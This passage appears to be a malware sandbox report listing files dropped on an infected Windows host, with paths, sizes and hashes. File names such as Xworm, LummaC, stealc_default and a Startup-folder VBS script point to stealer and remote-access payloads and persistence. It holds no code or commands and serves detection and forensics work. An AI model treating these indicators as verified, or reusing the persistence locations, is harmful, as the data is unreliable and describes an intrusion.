C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2045521122-590294423-3465680274-1000\0f5007522459c86e95ffcc62f32308f1_896de533-e5fb-4eb9-8f2b-d363f3584dc5

Filesize
46B

MD5
d898504a722bff1524134c6ab6a5eaa5

SHA1
e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

SHA256
878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

SHA512
26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2045521122-590294423-3465680274-1000\0f5007522459c86e95ffcc62f32308f1_896de533-e5fb-4eb9-8f2b-d363f3584dc5

Filesize
46B

MD5
c07225d4e7d01d31042965f048728a0a

SHA1
69d70b340fd9f44c89adb9a2278df84faa9906b7

SHA256
8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

SHA512
23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StackTrace.vbs

Filesize
85B

MD5
c7df7b3a28ad2f74eb6b2f6574b2d250

SHA1
1937d0d95e388b79733972c5881b664e785c968d

SHA256
7d59fb2a02f186297754faeb8283f4b570b00c1b0f82f49658cf2a6effb807c1

SHA512
b9e6b7b5afe2f4f6af3f1c4baa47d57a551b1568ef60cdd4855c10c59fae1d6265a22b26f12fbad64b5a6fed70d6a3958f689b41cd3703c56653577cc4fa62f9

Download Submit
C:\Users\Admin\AppData\Roaming\app

Filesize
5B

MD5
c60feebd511c87b86dea130692995a0f

SHA1
d64447a8b3d8949cab5a1f8d168f7c6fee6b6a0a

SHA256
632994320c04707e7ef564b3e983a694170561659552a24dfe14a922dcf0f511

SHA512
bf03fbf3329c6f7a21ecd620319ef1a6f676b22a27afd24aab546483c3fe5f6eee7bbcfdc14c5f6626957f2b96519bdd21aaea45d74a80253fa4220c8c12df7c

Download Submit
C:\Users\Admin\AppData\Roaming\gdi32.dll

Filesize
173KB

MD5
ac2602b169e8948ea4ecd30aeefc5b03

SHA1
99a3458622b586477a4df3c1b173892d98de1bb1

SHA256
014c9d23f572e0df38c32e294f351c6c232f0118fc6aba8a2a2d70f3c55929f4

SHA512
9c9c3fc9c7164ad59564fdfd027b305396c3d589b95826f24a5fec1fe6bde84d3ddac52b8862994b2338e0ef7602fbc9a14999ff986f99d2c21256d53eb03d18

Download Submit
C:\Users\Admin\Desktop\CompareConnect.bat

Filesize
714KB

MD5
785e1a46c4b2cf8df85eb3c974d597ec

SHA1
ebcbec3ddb71d4edec3a6fac38c9e4413625b0ab

SHA256
b02053bedaec6cf88c9a7ce7a994655dfde377789ff0ff906c341fc50cb4aa62

SHA512
6606f0e561a52b173aa08b29ad70707b6bdab0d920a8e3a72e3a229127b6ce195808415d73a1dbca16f140394a6ed539e88b50278595fe74aa4b3c0b06257279

Download Submit
C:\Users\Admin\Desktop\ConnectReset.xlsx

Filesize
12KB

MD5
9ea1ff6324e54977c51a2347c88f506f

SHA1
7db4eeff13edf23d9ec214988334ad7cac17ba79

SHA256
b87f49e1dfdec59f383c0859c268014f8457081ad4f3d5751c41669e9b2ff643

SHA512
2ea2d549abfcf61c4905301db238b8b821fd611874f578f0b4b4825ddada39549f3514aa4ec459552b3d7a05faa2bf0c5ab8e34366f9e240e9d3cc9701613840

Download Submit
C:\Users\Admin\Desktop\EditExit.bmp

Filesize
1.1MB

MD5
b5d84e6734c0dbe1bde928d4b7d2cbf6

SHA1
d68d2f34025008b8e1b79e8e08fc1b547d1e4c60

SHA256
9d308ba41afe832cc0cf83cec8ece4a68a3d657d51b9d71d1406983915831d98

SHA512
eb03b9805b6bb9d991369f72cf78781bd068e681c63eedf8705997d48f41753741abf19aabf2e0ad67ad107b1ac29ded7197c0be375acf7c6712b23ea5be1608

Download Submit
C:\Users\Admin\Desktop\EditOptimize.wma

Filesize
888KB

MD5
1a03ee30afded2e89e2ffd818bf7da0c

SHA1
93eff023370635c44ca4c7bec1bddb8bf2df0f61

SHA256
b2d5017fa13ffd128352cfa09fea00851600b7f6e955ed489c53698d966f939d

SHA512
8fc501c2a2c1b3fba646944d43916c5b077138ffd5a1228cc93e12828b427299b927ec57999ad8b08311df4a342109243866031949009846e031657e0fa715a0

Download Submit
C:\Users\Admin\Desktop\ExitCompare.mpeg

Filesize
958KB

MD5
e610e277c20812c1d0426edeace3791c

SHA1
39d9d468ed74ebb2b815d5bb9c847be1b490fc84

SHA256
a38490723adba2439bda0dd51b15bbc8e68a9e8177a31a4f52a5e833e6095a4f

SHA512
82b11fe70ac26b011848dd6f86dc1f9de69794a6153451e6f5721d07ac2538d540a04f6c0e45e6159158fe6efc76b86094f66a3cb9d92fbcfaeb7ab1cc8d9942

Download Submit
C:\Users\Admin\Desktop\Files\02.08.2022.exe

Filesize
242KB

MD5
e0ae1e583bca9db63318c6435caebb04

SHA1
e236d2e3c0b66b013027fb656070cdc0551b24cc

SHA256
da7b0a780f1caef5d96ae9e805cb8239c9a96f4c5222bdeed36caefa2f912040

SHA512
d4b8275af531a7a1085cadd86ff2330216eb50ce4ceb5298520eb5bb0a799a4885085a74000a9e68be57b0a855d2dd837202d53619ff282107dfa1f4e7c5ea61

Download Submit
C:\Users\Admin\Desktop\Files\2r61ahry.exe

Filesize
5.0MB

MD5
943590af47af06d1bca1570bc116b25d

SHA1
53eeb46310d02859984c6fa0787c5e6e3a274198

SHA256
d36de86e88ad124a4d4707dc60f136a6782f29af17f76f3714e37dec30f03201

SHA512
c3604262bcddc1bd092e29c17527d14f445ece56845b7a1596c735140a5590f947bc5796492f74fa1c673d3deeb69066de25a8ecd5f879ef6e15c44f0cf1f773

Download Submit
C:\Users\Admin\Desktop\Files\Amogus.exe

Filesize
3.2MB

MD5
23c072bdc1c5fe6c2290df7cd3e9abf8

SHA1
e10c6f7843e89f787866aac99c0cb7a3b2c7a902

SHA256
8c7fd294ec6500a01038f916ecab9ec6a92c9f71f02400a47dc73b34fee7f490

SHA512
5e18db624ec40d90776a80d90fa80a8a39f7fcd56a523e2d831942934b00e501e7009cc37b17fa4b29a2c2e5c1895c65fdc3259421fb3ce6ea9da50048c50e0e

Download Submit
C:\Users\Admin\Desktop\Files\BeamNG.UI.exe

Filesize
47KB

MD5
583b2abf1d9d7ee5e3b21d671074f691

SHA1
d6557131cd6266d9a7fa3a301a852809dab5e481

SHA256
fc1443222c765d941e38f6e796f9fd82538ac31ba06322e7534eeccf08f0e2c4

SHA512
50e67acd3c0acb719986a005fa3a63ce28a4f5a454f2ff3ec2b37457a73161b4140518eb978d2dfa09ed28113ab36429006bf1a25a3a06e9dcde632b2c480072

Download Submit
C:\Users\Admin\Desktop\Files\ConsoleApp3.exe

Filesize
15KB

MD5
eb2e78bbb601facb768bd61a8e38b372

SHA1
d51b9b3a138ae1bf345e768ee94efdced4853ff7

SHA256
09d97363cb679a12a09d9795569b38193991362c3b6981d7154b17d34f36f8cf

SHA512
5c2ce80953a39393a6a63c772390709e2140bf9b7e7a7765767bc5ae6fb27e52fa7f9237a918dd8060a83667f29ed47e12adef26127f183bea58859e93c3b9f4

Download Submit
C:\Users\Admin\Desktop\Files\DIFF.exe

Filesize
3.0MB

MD5
1f602b0591142d5da70ebd17228d2d46

SHA1
b5763fa5c3d791b9f8f4ee75e3aa1546d8911337

SHA256
a2eb96a74d37068c2116ecdd5f6efbc3bbe83220d98ed9b3bbbe22f6fd23ea72

SHA512
610db95aaf6d14e0ccb5b943c2e7fb7577bf7b57ae93247a413534105144c37f970a66b13dd990badc874d1bf7d28f229c56e4a9aaf87a5be1bcb8b1d11eda35

Download Submit
C:\Users\Admin\Desktop\Files\DOC.exe

Filesize
2.5MB

MD5
2dbdc645b9776239b18f772c30c1a626

SHA1
8677b8ea4f077a8c708a0d894e18513828c30322

SHA256
2b92d1c34b7f0278703c98e9fd755e061d0f120eea327996b223dfc65610dfcd

SHA512
ae5499ad2c40bd8756d614fea51f48c7b8fca4621b489da97f05cc55cf4a9a6032f9ec0c70ed03915da0e021ed9e4cca16810b18d3825ece9dac25e1d74d6fec

Download Submit
C:\Users\Admin\Desktop\Files\DivineDialogue.exe

Filesize
2.1MB

MD5
7daf2d8d7def7cf4420e42a69d75b56f

SHA1
b6e5217791f28bd9e6bb782a09140d731a873533

SHA256
03a1a478360f687b547445d82320989121f006f3cead2e3e6b9c02fde90b3f22

SHA512
006fd0a25c74a8cf71875aedc27960df5e03f623cc624194b1b51620d1fa9f2541da4850594842e23386a50de5c90c955617f3aa52990a984790ce67506883af

Download Submit
C:\Users\Admin\Desktop\Files\EakLauncher.exe

Filesize
9.0MB

MD5
58cc5b6a59821f4e6e002af2c81b545e

SHA1
0bf5d73526ac53db20abfaa16661aef0311822bc

SHA256
7ec5e07c8ba0b6ef6067c426195be2fc794c9d4713d4fbfefc07b89333e57efb

SHA512
bf9dedd93fce2410b20eca55aea1fd092599eb307133cb2d57372a575727388990b1ba06979307f84583dea6ef9a6127752d430a96141e97026348442848a36a

Download Submit
C:\Users\Admin\Desktop\Files\Edge.exe

Filesize
1.9MB

MD5
e30340895091ee6f449576966e8448fb

SHA1
4ccb079e7eedbf7113a803c6859241bb56978b4f

SHA256
126d9d9886f57e39642744a8bf62681577fbee52b88fba4c4c5097b04501eade

SHA512
c9116fc043e188b50294ebf8f3b661c55d73735773f61d90ae6d2f1ad06f84aabeb80953a7cddce7e7f75cefd979f16d684c81dd853bd0673536252882a6e0ee

Download Submit
C:\Users\Admin\Desktop\Files\InfluencedNervous.exe

Filesize
815KB

MD5
1b0fe9739ef19752cb12647b6a4ba97b

SHA1
0672bbdf92feea7db8decb5934d921f8c47c3033

SHA256
151247e9379a755e3bb260cca5c59977e4075d5404db4198f3cec82818412479

SHA512
1c67f07c38c1a1d360675b8c3214ee7ee107bb4b48dbf8d3c2cd2c2cfbf9205847e77d73979a9ef907d1011ef525245ab295aae651c0f48b4368a73af873319b

Download Submit
C:\Users\Admin\Desktop\Files\LummaC222222.exe

Filesize
352KB

MD5
2f1d09f64218fffe7243a8b44345b27e

SHA1
72553e1b3a759c17f54e7b568f39b3f8f1b1cdbe

SHA256
4a553c39728410eb0ebd5e530fc47ef1bdf4b11848a69889e8301974fc26cde2

SHA512
5871e2925ca8375f3c3ce368c05eb67796e1fbec80649d3cc9c39b57ee33f46476d38d3ea8335e2f5518c79f27411a568209f9f6ef38a56650c7436bbaa3f909

Download Submit
C:\Users\Admin\Desktop\Files\Server.exe

Filesize
43KB

MD5
c9f41a3ed0dfafb9a6268d8828f4c03e

SHA1
79366b8d5fb765398d6b0f3da1bee0ee66daafb2

SHA256
3d34af6f1b5f337212f9dc65ef22f6ff9009a5c2647dbe6f8c5b4b12c2b89258

SHA512
26991a889399579b97c079eeac26910e88ad9d69dc4d62f212b4b43aca051c30665581db4169c0cd6875370e224d40efd2a8d197264f2418acedb1b123e1c916

Download Submit
C:\Users\Admin\Desktop\Files\Server1.exe

Filesize
93KB

MD5
71b3810a22e1b51e8b88cd63b5e23ba0

SHA1
7ac4ab80301dcabcc97ec68093ed775d148946de

SHA256
57bf3ab110dc44c56ed5a53b02b8c9ccc24054cf9c9a5aacc72f71a992138a3f

SHA512
85ddc05305902ed668981b2c33bab16f8e5a5d9db9ff1cee4d4a06c917075e7d59776bebfb3a3128ec4432db63f07c593af6f4907a5b75c9027f1bc9538612e8

Download Submit
C:\Users\Admin\Desktop\Files\Set_up.exe

Filesize
72KB

MD5
7f44b7e2fdf3d5b7ace267e04a1013ff

SHA1
5f9410958df31fb32db0a8b5c9fa20d73510ce33

SHA256
64ffa88cf0b0129f4ececeb716e5577f65f1572b2cb6a3f4a0f1edc8cf0c3d4f

SHA512
d2f0673a892535c4b397000f60f581effa938fdd4b606cf1bebcef3268416d41a1f235100b07dcae4827f1624e1e79187c2513ca88a5f4a90776af8dbaad89ae

Download Submit
C:\Users\Admin\Desktop\Files\SrbijaSetupHokej.exe

Filesize
4.5MB

MD5
528b9a26fd19839aeba788171c568311

SHA1
8276a9db275dccad133cc7d48cf0b8d97b91f1e2

SHA256
f84477a25b3fd48faf72484d4d9f86a4152b07baf5bc743656451fe36df2d482

SHA512
255baefe30d50c9cd35654820f0aa59daccd324b631cc1b10a3d906b489f431bba71836bb0558a81df262b49fb893ca26e0029cca6e2c961f907aac2462da438

Download Submit
C:\Users\Admin\Desktop\Files\Statement-415322024.exe

Filesize
5.5MB

MD5
77329e2f37748be7fa31c1ef3aadf95c

SHA1
9a8fef3b353ddd2f02af3e41dccd9f8664ecde48

SHA256
bdf4a780598a26b5c6ab1396122ddc70698991195e8b7067aba4ff3a1a3a84bd

SHA512
14f2432c385f7880c215cfc4de95d7627bcc58a5f9287ed7018c921ab9cd1dcafb420936cbf2fabdd7ce5bce795c629589253c022baef328057c8a5cdfb0656b

Download Submit
C:\Users\Admin\Desktop\Files\XClient.exe

Filesize
64KB

MD5
713ca1f8ec4074b3ee385feded17e9cc

SHA1
bb3baa5440fbf87d097b27c60c7a95d53c85af02

SHA256
2a3514578e78c6d33ec89ed24f693c84804f0f10545779cd11626eedb7bdfc14

SHA512
8d16ade6aca158fad703bc9b1dd16af201efe629e39b5f86bbfdd524854a4783f1333c7e1820750d71ef299aef067ea01af4f0e0dbbadb15f657504845154557

Download Submit
C:\Users\Admin\Desktop\Files\Xworm%20V5.6.exe

Filesize
14.9MB

MD5
56ccb739926a725e78a7acf9af52c4bb

SHA1
5b01b90137871c3c8f0d04f510c4d56b23932cbc

SHA256
90f58865f265722ab007abb25074b3fc4916e927402552c6be17ef9afac96405

SHA512
2fee662bc4a1a36ce7328b23f991fa4a383b628839e403d6eb6a9533084b17699a6c939509867a86e803aafef2f9def98fa9305b576dad754aa7f599920c19a1

Download Submit
C:\Users\Admin\Desktop\Files\ZinTask.exe

Filesize
2.5MB

MD5
dba7abdb1d2ada8cb51d1c258b1b3531

SHA1
fa18a0affb277c99e71253bca5834e6fe6cd7135

SHA256
3d0a544073fc4c02d5634bd33f76f9dae07d9a325340ed747bcfde51ea52e23f

SHA512
0491865151140a5252a87a771f6552fd527fae3dec3c43ca0b806702e7ad4953b7d16bd1d8f275828f8b094bc337f79ed5c298beed4ec99186e4f4c3bd3cdf2a

Download Submit
C:\Users\Admin\Desktop\Files\bp.exe

Filesize
52KB

MD5
6733c804b5acf9b6746712bafaca17da

SHA1
78a90f5550f9fd0f4e74fea4391614901abb94fc

SHA256
ce68786d9fcb2e0932dbd0cba735690dfd3a505158396ed55fd4bb81b028ace0

SHA512
9e1c72d081b3aaed9f8ec97f7a5ed5e8b828b92ee8fd3e1ebb98834b0ba8008110fca97456354a281afcaed351d5a9625ea4a225394f524070ad028c9f221b41

Download Submit
C:\Users\Admin\Desktop\Files\build_2024-07-25_20-56.exe

Filesize
348KB

MD5
bea49eab907af8ad2cbea9bfb807aae2

SHA1
8efec66e57e052d6392c5cbb7667d1b49e88116e

SHA256
9b645f570116d3e10faa316981e4fcde6fe55417feced3385cfbb815c7df8707

SHA512
59486e18be6b85f5275c19f963d124f4f74c265b5b6dfa78c52f9243e444f40a7747a741ccb59bf1863ffb497321324c803fc967380900a6a2e0219eb99f387c

Download Submit
C:\Users\Admin\Desktop\Files\c1.exe

Filesize
547KB

MD5
2609215bb4372a753e8c5938cf6001fb

SHA1
ef1d238564be30f6080e84170fd2115f93ee9560

SHA256
1490105c73976217f35fe31d65939d1d9711d370c61f3d7d892afbb07eaaec63

SHA512
3892f3e4188250ab0d3508dd9c1825fa6dfab4fc50b4bc858703123e5512071d710fd8431f94912e74eaa4ca29b40c0b1b97805a5432a07fc09c35a87e6b23d2

Download Submit
C:\Users\Admin\Desktop\Files\cbchr.exe

Filesize
422KB

MD5
9a9afbcbaee06f115ea1b11f0405f2bd

SHA1
18cc3948891c6189d0ba1f872982c3fe69b3a85b

SHA256
231711e92fe376ed10c7111645e2a53f392726214c7958afcef4b2b5d0885f17

SHA512
dcb6b2e888ef234eb775efdac636ab3997bc04d48d50781b4ad4eb77991dfef4a7370441de8c89ff9d17ac5e8d337c5c991f221671fd424f571abbc0f2fe1670

Download Submit
C:\Users\Admin\Desktop\Files\channel.exe

Filesize
6.3MB

MD5
51dd8d9912686daa950d583dad0aa631

SHA1
c12bcbe236d7f939b4b30efa25e2afab0512cb53

SHA256
947320655731a7d64ebc3b134f74d35fa6e391f8c46b66536db11163f50440af

SHA512
7416bc215c2b809f13315c09551167f95226ed4cbdd8ed1dc110ac4eff270a644c9aaa8402bd641d60bc1d0977478cb518e6655fcd142f5eaca698fc1584be71

Download Submit
C:\Users\Admin\Desktop\Files\keygen.exe

Filesize
54KB

MD5
3bd08acd4079d75290eb1fb0c34ff700

SHA1
84d4d570c228271f14e42bbb96702330cc8c8c2d

SHA256
4d3d060d8ec7089acfb4ba233d6f2a00a910503be648709a97714c84a80cccd8

SHA512
42309b28e5bf15ee9a4708ffcdb18ef2925d4b51151dab75168d3578db538b658c706cd77bfceae9a927516d3fb4b4bd3356e0ee066af5aaeadaa00ecff9a760

Download Submit
C:\Users\Admin\Desktop\Files\kill.exe

Filesize
13KB

MD5
789f1016740449ce3e9a7fe210383460

SHA1
e0905d363448178d485ed15ee6f67b0f1d72e728

SHA256
71068065d8dd7daa9c49687b973d05d5602ed994467728763d2213fe4d90c0d8

SHA512
b63467a55f11f8e3e6dfee195e5a64d7dec621834e1c26e1f64210496dbad36409771968a5e3b2f142fb6196df5689c012f5971ca2fd4bb3b1311f8f66f2f2fa

Download Submit
C:\Users\Admin\Desktop\Files\s.exe

Filesize
79KB

MD5
0c883b1d66afce606d9830f48d69d74b

SHA1
fe431fe73a4749722496f19b3b3ca0b629b50131

SHA256
d921fc993574c8be76553bcf4296d2851e48ee39b958205e69bdfd7cf661d2b1

SHA512
c047452a23efad4262479fbfeb5e23f9497d7cefd4cbb58e869801206669c2a0759698c70d18050316798d5d939b989537fdce3842aa742449f5e08ed7fa60a5

Download Submit
C:\Users\Admin\Desktop\Files\stealc_default.exe

Filesize
187KB

MD5
e78239a5b0223499bed12a752b893cad

SHA1
a429b46db791f433180ae4993ebb656d2f9393a4

SHA256
80befdb25413d68adbadd8f236a2e8c71b261d8befc04c99749e778b07bcde89

SHA512
cee5d5d4d32e5575852a412f6b3e17f8c0cbafe97fd92c7024934234a23c240dcc1f7a0452e2e5da949dec09dcfeb006e73862c5bbc549a2ab1cfb0241eaddfc

Download Submit
C:\Users\Admin\Desktop\Files\tacticalagent-v2.8.0-windows-amd64.exe

Filesize
4.3MB

MD5
ed40540e7432bacaa08a6cd6a9f63004

SHA1
9c12db9fd406067162e9a01b2c6a34a5c360ea97

SHA256
d6c7bdab07151678b713a02efe7ad5281b194b0d5b538061bdafdf2c4ca1fdaa

SHA512
07653d534a998248f897a2ed962d2ec83947c094aa7fe4fb85e40cb2771754289fe2cef29e31b5aa08e8165d5418fe1b8049dedc653e799089d5c13e02352e8d

Download Submit
C:\Users\Admin\Desktop\Files\trojan.exe

Filesize
93KB

MD5
03a91c200271523defc69d1086624c7a

SHA1
0742e4d35435c02bc13b4bfffc7b5f995d923b7d

SHA256
e9df366bbb1860c68f8005d6cfd305770784f03f9af6db37852067165a5a3b49

SHA512
16c0ad78e252cf6b2c107b594f060cb39093208d837250e80fb82e358f5bd957a4276f6b8fe656234fa919a0c79b028f181dd7d206a1e0148dce3581a0b2debf

Download Submit
C:\Users\Admin\Desktop\Files\windowsexecutable.exe

Filesize
304KB

MD5
58e8b2eb19704c5a59350d4ff92e5ab6

SHA1
171fc96dda05e7d275ec42840746258217d9caf0

SHA256
07d4b7768e13d79ac5f05f81167b29bb6fbf97828a289d8d11eec38939846834

SHA512
e7655762c5f2d10ec246d11f82d437a2717ad05be847b5e0fd055e3241caaca85430f424055b343e3a44c90d76a0ba07a6913c2208f374f59b61f8aa4477889f

Download Submit
C:\Users\Admin\Desktop\FindComplete.vstm

Filesize
1.0MB

MD5
b3eadab975d75afce13e9f64d62ee148

SHA1
e38271fe8633d95987b9d287e778d7e10387ce17

SHA256
e7d6544cf9103c5a472b9d72d9c622dcac65ca43f9a05e0be57c4338817f05ff

SHA512
0032670b49a86d3560b1a9071d63f53993cd92965bb86be225841b7e32c7f4a760225f59d261de09cdf73d213937154380b15aa4f88cd511abacb86395db50f8

Download Submit
C:\Users\Admin\Desktop\FormatUnblock.dot

Filesize
574KB

MD5
6b5f3242226fdb8c1d909bbf39d63ff5

SHA1
bdd902348934ccb5c9049551fdf7ef63336e0b97

SHA256
b04bbbb690403a1255d56fb6db3c28d6acd6144758f2f68dc1b8ab1ddcd47cd2

SHA512
cd118798146c57e8a4527c0b1ad9c0263a729d6f3b9557c096b5227b63d4b20cd2313db49817523dd4d0c405cdc85a4e90a3475c789ccd1a9e7249256ac3bb36

Download Submit
C:\Users\Admin\Desktop\GetSubmit.rle

Filesize
923KB

MD5
59f2f45a1a622dbd165cf581c4549a9a

SHA1
a54e145aab6897c632bc8b9068b6df68efe6b1de

SHA256
278fef68c9afcb5db0093a67b08c274d41e2568f9a06de4aabec3cb43b3060a0

SHA512
f0ae11b00a54632bf49b48307c37d8ad38569b59a8016320613de68520bcb7feb6a298681eaa8a8d3a47e4f04e5b1c1c5185f191e24346647f42fcfd520a2b62

Download Submit
C:\Users\Admin\Desktop\GroupFind.avi

Filesize
435KB

MD5
8f715650168c00cdc5ef733cc732fe6e

SHA1
aa398c117b92f03ad794cb72c4ce4fa978855890

SHA256
1093a13fbe8d32a423540029a42a54cb9ffced3badc9d9f34bd6974675f51fcd

SHA512
1d5f5b6d14d7807974637ed419ba01c611fdb9528ec389bdb220af0ce8e10f9617441598f45ef7698b94f001487f27e086231776246cc31de22c951f0ee2315e

Download Submit
C:\Users\Admin\Desktop\ImportDisable.wmv

Filesize
540KB

MD5
f3252cc8b00aa7932777371e0ea0a051

SHA1
a74efc4d4b3f4315c76e8b708bece6b491c2177a

SHA256
8c8663c07747a6a5e09704ccab99461040fe365d98c895b999a22000ed8e536b

SHA512
fa8d19239c86882a3ed4e8274a4391c41c83867df105c94c7c2e199308b3a1e95eed72cd2ba0788c7842aea6e93abb22770d91647b855281e1e016ef07342c11

Download Submit
C:\Users\Admin\Desktop\LockLimit.xlsx

Filesize
13KB

MD5
407107d23c2d1adbb276483ef3dedc17

SHA1
6c06aed86bfb7f9763d36c69e12db4c5eac1c4cb

SHA256
1adf4b463f0b4b2cb2474281146356d4e863b0dbe0b9cf830238c2c5575fe118

SHA512
70636c3d45c440799a75035e6c85f291e8d0bd6cc4124d39b79313eb3250fae274c031650885fe6eb17510311605d17f31bb8bb887bc91daf92b80f57c3d41ca

Download Submit
C:\Users\Admin\Desktop\MeasureGet.dxf

Filesize
1.0MB

MD5
9aac5450cd8532a9b39d3c7deca79c30

SHA1
2e131b9f8c6291e6e556e23d5970993484207d1f

SHA256
362ae7dbb1f2204813a385aef00d5a36e06962b4d098816c6b31249a56e6f40e

SHA512
ec1bf685271457eb77c6e1dde935505757d5a088501e6b85ba9863008852326dc31a76332c90443005d3b2b60c78674dd14fbcf165b98d4ccd00a3ed3c53a099

Download Submit
C:\Users\Admin\Desktop\Microsoft Edge.lnk

Filesize
2KB

MD5
898e4c605e6f80aa2c86e7fb916aafdd

SHA1
55dad04bc08f98c55771e6ee1ed87f200333afab

SHA256
f9f31cdf27c0594c4c592ee5291bbed211a1342633892d4cf5b2366744d6d860

SHA512
aa2ff20881373003efb04ed49ec556ae33dbc9996c2c3a513271ab9e055291edad3f9c5605c31e30dce883473dae8eeff7cbcb03f1538fcab08d62eb894994ad

Download Submit
C:\Users\Admin\Desktop\New Text Document mod.exse\a\02.08.2022.exe

Filesize
234KB

MD5
718d9132e5472578611c8a24939d152d

SHA1
8f17a1619a16ffbbc8d57942bd6c96b4045e7d68

SHA256
09810b0365c5ac275cca1a45ea00b00fdca819b7f10ce2c8a6a50a456d9e1ced

SHA512
6ae73ad6156bafa2e3f9a2b3466bca4d0a38d562b40aa29a84b6c9fe9380d2f99d73235b5d70208d6f2a3f607710eebf8c4daed6d387add0d933933fdd8c05de

Download Submit
C:\Users\Admin\Desktop\New Text Document mod.exse\a\7mpPLxE.exe

Filesize
320KB

MD5
360daaee95ed2dd3d3d9cdc5cdf88481

SHA1
0ab9f265074374aff7cf1dcb88d0b226becc080c

SHA256
ddd58982b01731ca4fe85c0f514fd432726b44e396e91ee7349749218ec11412

SHA512
195ca9d22565a66e3b71bd71cdaf749f381fcca1a262202113bf7b9a5cf9b4c1db7d1deb39d03c18b99059c57428b7e354ec06dd27e8f8893d274e9c170ea2a2

Download Submit
C:\Users\Admin\Desktop\New Text Document mod.exse\a\9758xBqgE1azKnB.exe

Filesize
439KB

MD5
bf7866489443a237806a4d3d5701cdf3

SHA1
ffbe2847590e876892b41585784b40144c224160

SHA256
1070bf3c0f917624660bef57d24e6b2cf982dce067e95eb8a041586c0f41a095

SHA512
e9bb9d5157d2011eed5f5013af4145877e3237def266f2cc6fd769ed7065a4fa227f7d316de5fc7eeae8f3f852b685fb3cc166127f79134f1fa1a200b8c0c186

Download Submit
C:\Users\Admin\Desktop\New Text Document mod.exse\a\AmLzNi.exe

Filesize
1.0MB

MD5
73507ed37d9fa2b2468f2a7077d6c682

SHA1
f4704970cedac462951aaf7cd11060885764fe21

SHA256
c33e3295dcb32888d000a2998628e82fd5b6d5ee3d7205ea246ac6357aa2bea6

SHA512
3a1031ce2daf62a054f41d226e9c9a0144ce746130db68737aaaa7930b148cbfbb99476c05504d6ebd4911f4e567ec1399005be7e64583caa636d7d94f5cd369

Download Submit
C:\Users\Admin\Desktop\New Text Document mod.exse\a\TPB-1.exe

Filesize
409KB

MD5
2d79aec368236c7741a6904e9adff58f

SHA1
c0b6133df7148de54f876473ba1c64cb630108c1

SHA256
b33f25c28bf15a787d41472717270301071af4f10ec93fa064c96e1a33455c35

SHA512
022c5d135f66bc253a25086a2e9070a1ae395bdedd657a7a5554563dace75e1cbfe77c87033d6908d72deeab4a53f50e8bd202c4f6d6a9f17a19a9ebfdfe9538

Download Submit
C:\Users\Admin\Desktop\New Text Document mod.exse\a\TikTok18.exe

Filesize
2.4MB

MD5
70a396a9f154f9a70534b6608e92cb12

SHA1
1a4c735936c372df4f99a3ff3a024646d16a9f75

SHA256
51638445d940ee396b2d963473fa473840459920f0201a765ccb8cf8869741d5

SHA512
72322ef6c4ee7c278dccd755a487463e09e34551a2fd3f1fe7ba1bc216e275e7e17f36dbcf4f48b48875f416affc41bf9d2617fbd7fde759f265e7bdd55cc203

Download Submit
C:\Users\Admin\Desktop\New Text Document mod.exse\a\URGMwM6.exe

Filesize
612B

MD5
e3eb0a1df437f3f97a64aca5952c8ea0

SHA1
7dd71afcfb14e105e80b0c0d7fce370a28a41f0a

SHA256
38ffd4972ae513a0c79a8be4573403edcd709f0f572105362b08ff50cf6de521

SHA512
43573b0cbaac6e2e1646e6217d2d10c40ad10b9db1f4492d6740545e793c891b5e39283a082896c0392b88eb319dfa9392421b1c89c094c9ce9f31b53d37ebaf

Download Submit
C:\Users\Admin\Desktop\New Text Document mod.exse\a\VBVEd6f.exe

Filesize
1.1MB

MD5
7f8c660bbf823d65807e4164a91dd058

SHA1
97ac83cbe12b04fbe1b4d98e812480e1f66d577d

SHA256
5a45b35e922d52f1bc47530634465ed1f989d9916684bf9591006a6172542509

SHA512
89872cc15ca3a91d43b0b4261b04c38b8ac545c9b4afdb47d2b0288167b512fbe709de04fd2d1809ca1afee67a5a799aa7943f5aff65a5aa3197f9e10545c919

Download Submit
C:\Users\Admin\Desktop\New Text Document mod.exse\a\Winsvc.exe

Filesize
2.1MB

MD5
169a647d79cf1b25db151feb8d470fc7

SHA1
86ee9ba772982c039b070862d6583bcfed764b2c

SHA256
e61431610df015f48ebc4f4bc0492c4012b34d63b2f474badf6085c9dbc7f708

SHA512
efb5fd3e37da05611be570fb87929af73e7f16639b5eb23140381434dc974afc6a69f338c75ede069b387015e302c5106bf3a8f2727bb0406e7ca1de3d48a925

Download Submit
C:\Users\Admin\Desktop\New Text Document mod.exse\a\XClient.exe

Filesize
32KB

MD5
ce69d13cb31832ebad71933900d35458

SHA1
e9cadfcd08d79a2624d4a5320187ae84cf6a0148

SHA256
9effe406fd302590314a9211fda92126ea6a7721d294c93fdf755b4cdfbd0bcf

SHA512
7993e79a9aeee679c9342d36fcb7624f1e7616db59eff10ff50d00e84bbbc5d9d7c154601f8a94bed7f25888f43f6f1922b87af31a582221e9022e6a8c3b1409

Download Submit
C:\Users\Admin\Desktop\New Text Document mod.exse\a\Xworm%20V5.6.exe

Filesize
14.9MB

MD5
3273f078f87cebc3b06e9202e3902b5c

SHA1
03b1971e04c8e67a32f38446bd8bfac41825f9cc

SHA256
4b6caa8467cf7ca3d7a3d3b2ac70e48510b7c4570e4810f3305aca1ef6cdf85c

SHA512
2a0bc7bf3ffd2f2e027e0feffb803f76dd11da48335e1b66a3c1927410e0a82c6ce212901c2ace9eca5bcce51eee49a12dc4619fc31711f0770e2d55ab7730f9

Download Submit
C:\Users\Admin\Desktop\New Text Document mod.exse\a\fHR9z2C.exe

Filesize
254KB

MD5
892d97db961fa0d6481aa27c21e86a69

SHA1
1f5b0f6c77f5f7815421444acf2bdd456da67403

SHA256
c4b11faff0239bc2d192ff6e90adec2684124336e37c617c4118e7e3bc338719

SHA512
